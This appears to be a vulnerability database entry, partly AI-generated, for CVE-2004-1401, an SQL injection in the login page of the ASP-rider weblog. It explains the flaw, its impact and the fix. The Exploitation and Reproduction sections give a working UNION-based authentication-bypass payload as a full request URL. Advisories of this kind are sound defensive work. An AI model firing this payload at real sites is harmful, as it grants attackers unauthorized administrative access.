CVE-2004-1401
Description
SQL injection in ASP-rider verify.asp allows unauthenticated remote attackers to bypass authentication and execute arbitrary SQL statements.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
SQL injection in ASP-rider verify.asp allows unauthenticated remote attackers to bypass authentication and execute arbitrary SQL statements.
Vulnerability
CVE-2004-1401 is an SQL injection vulnerability in the verify.asp file within the blogadmin folder of ASP-rider, a Farsi weblog application written in ASP. The vulnerability exists because the username parameter is not sanitized before being used in an SQL query, allowing an attacker to inject arbitrary SQL statements. ASP-rider versions up to and including the affected release are vulnerable, as noted in the advisory [1].
Exploitation
An attacker can exploit this vulnerability remotely without authentication by crafting a malicious HTTP request to the verify.asp page. The advisory [1] provides a proof of concept: by sending a request such as /blogadmin/verify.asp?username='union select 1,1,1,1,1,1,1,1 from tbl_users where ''='&password=1, the attacker can bypass the login mechanism and gain administrative access. This is a classic blind SQL injection using a UNION-based technique.
Impact
Successful exploitation allows an unauthenticated attacker to bypass authentication entirely and gain administrative access to the ASP-rider weblog. This can lead to full compromise of the application, including unauthorized modification of content, disclosure of sensitive data, and further exploitation of the server [1].
Mitigation
The vulnerability was patched by the vendor at the time of disclosure, as stated in the advisory from 2004 [1]. Users should ensure they are running a version of ASP-rider that includes the fix, or apply input sanitization to the username parameter in verify.asp. No further official updates are expected, as the software is likely end-of-life. This CVE is not listed on the CISA Known Exploited Vulnerabilities catalog.
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization in the username parameter of verify.asp allows SQL injection."
Attack vector
An attacker sends an HTTP request to `verify.asp` with a crafted `username` parameter containing a SQL injection payload [ref_id=1]. The proof-of-concept shows a `union select` injection that bypasses authentication entirely, allowing the attacker to log in as any user without knowing the correct password [ref_id=1]. The attack requires only network access to the web server and no prior authentication.
Affected code
The vulnerable file is `verify.asp` located in the `blogadmin` folder [ref_id=1]. This file handles authentication for the ASP-rider weblog administrator panel.
What the fix does
The advisory states the vulnerability "is already patched" but does not include the patch content or describe the specific fix [ref_id=1]. The likely remediation is to sanitize or parameterize the `username` input in `verify.asp` to prevent SQL injection, such as using parameterized queries or escaping single quotes.
Preconditions
- networkThe target must be running ASP-rider weblog software with the vulnerable verify.asp accessible.
- authNo authentication is required; the attacker can reach the login page anonymously.
Reproduction
Navigate to `http://www.site.com/weblog/blogadmin/verify.asp?username='union select 1,1,1,1,1,1,1,1 from tbl_users where ''='&password=1` to bypass authentication and log in to the administrator page [ref_id=1].
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
4News mentions
0No linked articles in our index yet.